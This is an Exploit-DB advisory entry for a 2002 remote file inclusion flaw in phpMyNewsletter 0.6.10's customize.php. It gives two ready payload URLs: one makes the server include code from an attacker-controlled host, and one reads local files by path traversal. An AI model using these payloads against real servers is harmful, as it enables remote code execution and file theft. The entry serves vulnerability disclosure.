Lucene search

K
exploitdbFrogEDB-ID:21905
HistoryOct 03, 2002 - 12:00 a.m.

phpMyNewsletter 0.6.10 - Remote File Inclusion

2002-10-0300:00:00
frog
www.exploit-db.com
18

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/5886/info

A vulnerability has been discovered in phpMyNewsLetter.

Reportedly, it is possible to pass an attacker-specified file include location to a CGI paramter of the 'customize.php' script. 

This may allow an attacker to execute arbitrary commands with the privileges of the webserver.

Additionally, an attacker may exploit this problem to view local webserver readable files.

http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
<? echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view

AI Score

7.4

Confidence

Low

Related for EDB-ID:21905